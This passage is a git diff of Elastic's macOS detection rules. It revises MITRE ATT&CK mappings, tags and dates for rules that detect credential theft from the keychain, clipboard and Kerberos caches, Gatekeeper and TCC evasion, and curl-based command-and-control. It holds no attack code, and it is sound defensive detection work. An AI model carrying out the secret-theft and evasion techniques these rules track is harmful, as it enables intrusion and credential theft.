"T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat.technique.subtechnique]] -id = "T1102.002" -name = "Bidirectional Communication" -reference = "https://attack.mitre.org/techniques/T1102/002/" + [[rule.threat.technique.subtechnique]] + name = "Python" + id = "T1059.006" + reference = "https://attack.mitre.org/techniques/T1059/006/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique.subtechnique]] + name = "JavaScript" + id = "T1059.007" + reference = "https://attack.mitre.org/techniques/T1059/007/" diff --git a/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml b/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml index f56d62b60f8..ba69a5cda68 100644 --- a/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml +++ b/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -80,22 +80,22 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat.technique.subtechnique]] -id = "T1102.003" -name = "One-Way Communication" -reference = "https://attack.mitre.org/techniques/T1102/003/" + [[rule.threat.technique]] + name = "Ingress Tool Transfer" + id = "T1105" + reference = "https://attack.mitre.org/techniques/T1105/" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" + [[rule.threat.technique]] + name = "Web Service" + id = "T1102" + reference = "https://attack.mitre.org/techniques/T1102/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique.subtechnique]] + name = "Bidirectional Communication" + id = "T1102.002" + reference = "https://attack.mitre.org/techniques/T1102/002/" diff --git a/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml b/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml index 3777c19d34f..cd1e4aa5a67 100644 --- a/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml +++ b/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/07" [rule] author = ["Elastic"] @@ -85,10 +85,16 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "destination.domain"] diff --git a/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml b/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml index 33c46e2cb91..9a0859fd9b0 100644 --- a/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml +++ b/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -188,15 +188,11 @@ id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "destination.domain"] diff --git a/rules/macos/credential_access_high_volume_of_pbpaste.toml b/rules/macos/credential_access_high_volume_of_pbpaste.toml index 91617be6e37..8cf8dad2102 100644 --- a/rules/macos/credential_access_high_volume_of_pbpaste.toml +++ b/rules/macos/credential_access_high_volume_of_pbpaste.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["endpoint", "jamf_protect"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.investigate]] @@ -88,7 +88,15 @@ Jamf Protect is integrated into the Elastic Agent using Fleet. Upon configuratio - Click "Save and Continue". """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Collection", "Data Source: Jamf Protect", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Jamf Protect", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -100,13 +108,14 @@ sequence by host.hostname, host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1115" -name = "Clipboard Data" -reference = "https://attack.mitre.org/techniques/T1115/" +id = "T1056" +name = "Input Capture" +reference = "https://attack.mitre.org/techniques/T1056/" + [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/macos/credential_access_kerberosdump_kcc.toml b/rules/macos/credential_access_kerberosdump_kcc.toml index 793106b873c..e566cdb00e5 100644 --- a/rules/macos/credential_access_kerberosdump_kcc.toml +++ b/rules/macos/credential_access_kerberosdump_kcc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -101,18 +101,24 @@ Kerberos is a network authentication protocol designed to provide secure identit [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [[rule.threat.technique.subtechnique]] -id = "T1558.005" -name = "Ccache Files" -reference = "https://attack.mitre.org/techniques/T1558/005/" +id = "T1558.003" +name = "Kerberoasting" +reference = "https://attack.mitre.org/techniques/T1558/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml index 8fdfc554d3f..d1bc68892c1 100644 --- a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml +++ b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/06" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -107,18 +107,29 @@ Keychain is macOS's secure storage system for managing user credentials, includi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [[rule.threat.technique.subtechnique]] id = "T1555.001" name = "Keychain" reference = "https://attack.mitre.org/techniques/T1555/001/" + +[[rule.threat.technique]] +id = "T1555" +name = "Credentials from Password Stores" +reference = "https://attack.mitre.org/techniques/T1555/" +[[rule.threat.technique.subtechnique]] +id = "T1555.003" +name = "Credentials from Web Browsers" +reference = "https://attack.mitre.org/techniques/T1555/003/" + + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/macos/credential_access_mitm_localhost_webproxy.toml b/rules/macos/credential_access_mitm_localhost_webproxy.toml index 2090aa8ae6e..356443d7e15 100644 --- a/rules/macos/credential_access_mitm_localhost_webproxy.toml +++ b/rules/macos/credential_access_mitm_localhost_webproxy.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -103,13 +103,14 @@ Web proxy settings in macOS manage how web traffic is routed, often used to enha [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" +id = "T1539" +name = "Steal Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1539/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml index f6ff2838586..24d5fa1fbd2 100644 --- a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml +++ b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/16" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -47,7 +47,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -105,36 +112,19 @@ OSASCRIPT is a macOS utility that allows the execution of AppleScript and other [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1056" name = "Input Capture" reference = "https://attack.mitre.org/techniques/T1056/" - [[rule.threat.technique.subtechnique]] id = "T1056.002" name = "GUI Input Capture" reference = "https://attack.mitre.org/techniques/T1056/002/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.002" -name = "AppleScript" -reference = "https://attack.mitre.org/techniques/T1059/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml b/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml index 8cdf00243f1..26ee109c54d 100644 --- a/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml +++ b/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/23" [rule] author = ["Elastic"] @@ -73,32 +73,10 @@ process.name:python* [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1539" -name = "Steal Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1539/" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.004" -name = "Private Keys" -reference = "https://attack.mitre.org/techniques/T1552/004/" - [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [[rule.threat.technique.subtechnique]] id = "T1555.001" name = "Keychain" @@ -108,6 +86,7 @@ reference = "https://attack.mitre.org/techniques/T1555/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "file.path"] diff --git a/rules/macos/defense_evasion_apple_softupdates_modification.toml b/rules/macos/defense_evasion_apple_softupdates_modification.toml index a69bb661f7e..744d460b16f 100644 --- a/rules/macos/defense_evasion_apple_softupdates_modification.toml +++ b/rules/macos/defense_evasion_apple_softupdates_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/15" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -99,13 +99,19 @@ In macOS environments, the SoftwareUpdate preferences manage system updates, cru [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml index 6a0a3ddec4b..2a5331cde71 100644 --- a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml +++ b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -107,18 +107,19 @@ In macOS, files downloaded from the internet are tagged with a quarantine attrib [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1553" -name = "Subvert Trust Controls" -reference = "https://attack.mitre.org/techniques/T1553/" - +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1553.001" -name = "Gatekeeper Bypass" -reference = "https://attack.mitre.org/techniques/T1553/001/" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml index 83062f06243..d56533056a0 100644 --- a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml +++ b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -102,18 +102,14 @@ Gatekeeper is a macOS security feature that ensures only trusted software runs b [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" reference = "https://attack.mitre.org/techniques/T1553/" -[[rule.threat.technique.subtechnique]] -id = "T1553.001" -name = "Gatekeeper Bypass" -reference = "https://attack.mitre.org/techniques/T1553/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml b/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml index 2ae593decbf..026222507de 100644 --- a/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml +++ b/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/03" [rule] author = ["Elastic"] @@ -76,17 +76,27 @@ configuration where host.os.type == "macos" and event.action == "gatekeeper_over [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1553" -name = "Subvert Trust Controls" -reference = "https://attack.mitre.org/techniques/T1553/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat.technique.subtechnique]] -id = "T1553.001" -name = "Gatekeeper Bypass" -reference = "https://attack.mitre.org/techniques/T1553/001/" + [[rule.threat.technique]] + name = "Impair Defenses" + id = "T1562" + reference = "https://attack.mitre.org/techniques/T1562/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique.subtechnique]] + name = "Disable or Modify Tools" + id = "T1562.001" + reference = "https://attack.mitre.org/techniques/T1562/001/" + + [[rule.threat.technique]] + name = "Subvert Trust Controls" + id = "T1553" + reference = "https://attack.mitre.org/techniques/T1553/" + + [[rule.threat.technique.subtechnique]] + name = "Gatekeeper Bypass" + id = "T1553.001" + reference = "https://attack.mitre.org/techniques/T1553/001/" diff --git a/rules/macos/defense_evasion_modify_environment_launchctl.toml b/rules/macos/defense_evasion_modify_environment_launchctl.toml index b3b64c7f9f5..cc25b452be3 100644 --- a/rules/macos/defense_evasion_modify_environment_launchctl.toml +++ b/rules/macos/defense_evasion_modify_environment_launchctl.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -47,7 +47,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -95,26 +102,19 @@ Environment variables in macOS are crucial for configuring system and applicatio [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml index 45222ba8d1c..142f83f0d06 100644 --- a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml +++ b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -49,7 +49,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -97,36 +104,19 @@ The Transparency, Consent, and Control (TCC) database in macOS manages app permi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1548.006" -name = "TCC Manipulation" -reference = "https://attack.mitre.org/techniques/T1548/006/" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.006" -name = "TCC Manipulation" -reference = "https://attack.mitre.org/techniques/T1548/006/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml index 001273f0e01..edcdf2e9347 100644 --- a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml +++ b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -47,7 +47,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -97,31 +105,26 @@ Secure Copy Protocol (SCP) is used for secure file transfers over SSH. On macOS, [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.006" -name = "TCC Manipulation" -reference = "https://attack.mitre.org/techniques/T1548/006/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/macos/defense_evasion_safari_config_change.toml b/rules/macos/defense_evasion_safari_config_change.toml index e7344238f35..4a35cd07257 100644 --- a/rules/macos/defense_evasion_safari_config_change.toml +++ b/rules/macos/defense_evasion_safari_config_change.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -100,13 +100,19 @@ The 'defaults' command in macOS is a utility that allows users to read, write, a [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1647" -name = "Plist File Modification" -reference = "https://attack.mitre.org/techniques/T1647/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml index 0108bed8fc5..308e0584ee7 100644 --- a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml +++ b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -101,13 +101,14 @@ Microsoft Office applications on macOS operate within a sandbox to limit potenti [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1211" -name = "Exploitation for Defense Evasion" -reference = "https://attack.mitre.org/techniques/T1211/" +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml index 8e521ac1de8..03d0581f379 100644 --- a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml +++ b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/03" [rule] author = ["Elastic"] @@ -18,7 +18,15 @@ name = "Suspicious TCC Access Granted for User Folders" risk_score = 73 rule_id = "ffd8b5e9-aa63-42b3-aead-6fdb170da9a3" severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Collection", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] type = "esql" note = """## Triage and analysis @@ -77,48 +85,30 @@ FROM logs-endpoint.events.* [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat.technique]] + name = "Abuse Elevation Control Mechanism" + id = "T1548" + reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.006" -name = "TCC Manipulation" -reference = "https://attack.mitre.org/techniques/T1548/006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique.subtechnique]] + name = "TCC Manipulation" + id = "T1548.006" + reference = "https://attack.mitre.org/techniques/T1548/006/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.006" -name = "TCC Manipulation" -reference = "https://attack.mitre.org/techniques/T1548/006/" + [rule.threat.tactic] + name = "Collection" + id = "TA0009" + reference = "https://attack.mitre.org/tactics/TA0009/" -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat.technique]] + name = "Data from Local System" + id = "T1005" + reference = "https://attack.mitre.org/techniques/T1005/" diff --git a/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml b/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml index 4a94c88a37e..11135c5720e 100644 --- a/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml +++ b/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -93,18 +93,36 @@ Elastic Endpoint Security's kernel extension is crucial for monitoring and prote [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" 